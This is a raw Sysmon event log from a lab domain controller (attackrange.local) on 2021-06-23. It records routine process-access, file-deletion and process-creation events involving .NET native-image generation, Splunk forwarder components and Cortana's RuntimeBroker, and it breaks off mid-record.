21:06:58.116{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A272-60D3-3305-00000000CF01}5516C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022688Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:58.087{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A272-60D3-3305-00000000CF01}5516C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022687Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:58.080{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A272-60D3-3305-00000000CF01}5516C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022686Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:58.072{4DB9351A-A271-60D3-3205-00000000CF01}6536NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\VSEHCNEROT\EventViewer.ni.dll.auxMD5=1A32F72493212F677415ED59CF716D2D,SHA256=3D3E276DA67057875F2F219BFB36D44431F2E549FB5004FDBABBECE3F1904633,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000022685Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:58.060{4DB9351A-A271-60D3-3205-00000000CF01}6536NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\VSEHCNEROT\EventViewer.ni.dllMD5=296A3FAB077099E2147D6795C54648FD,SHA256=1E2E55F9F6E82DFC37EE072932320896C3A03218E21026C654FCCFC8FB39BA93,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000022684Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:58.060{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A271-60D3-3005-00000000CF01}7124C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000022683Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:58.060{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6C9A5DE1CA67202ADF3A52ECD105CA81,SHA256=DCBBDB339850E33C6D3CE385E35C369F23997ACD583C8B1ADED74B8B145883A0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022682Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:58.060{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CE9E40589907E17C66F6068E118D6C1F,SHA256=3D89C6CDD9E59A193E6077058AF43B482B5E3FE01DF853F168415ACF1B58DC3B,IMPHASH=00000000000000000000000000000000falsetrue 
10341000x800000000000000022681Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:58.044{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022680Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:58.044{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022679Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:58.044{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A271-60D3-3005-00000000CF01}7124C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022678Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:58.029{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022677Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:58.029{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022676Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:58.029{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A271-60D3-3005-00000000CF01}7124C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000022675Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:57.873{4DB9351A-A271-60D3-3005-00000000CF01}7124C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000022674Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:58.029{4DB9351A-9F2B-60D3-C400-00000000CF01}7765616C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x800000000000000022673Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:58.029{4DB9351A-9F2B-60D3-C400-00000000CF01}7765616C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x800000000000000022672Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:58.029{4DB9351A-9F2B-60D3-C400-00000000CF01}7764780C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x800000000000000022671Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:58.029{4DB9351A-9F2B-60D3-C400-00000000CF01}7764780C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x800000000000000022670Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:58.029{4DB9351A-9F2B-60D3-C400-00000000CF01}7765616C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+26297|C:\Windows\system32\windows.cortana.Desktop.dll+214fb|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x800000000000000022669Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:58.029{4DB9351A-9F2B-60D3-C400-00000000CF01}7765124C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x800000000000000022668Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:58.029{4DB9351A-9F2B-60D3-C400-00000000CF01}7765124C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x800000000000000022667Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:58.029{4DB9351A-9F2B-60D3-C400-00000000CF01}7765616C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+21491|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x800000000000000022825Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.964{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A273-60D3-4405-00000000CF01}1100C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022824Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:59.964{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A273-60D3-4405-00000000CF01}1100C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022823Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.964{4DB9351A-A273-60D3-4305-00000000CF01}6436NT 
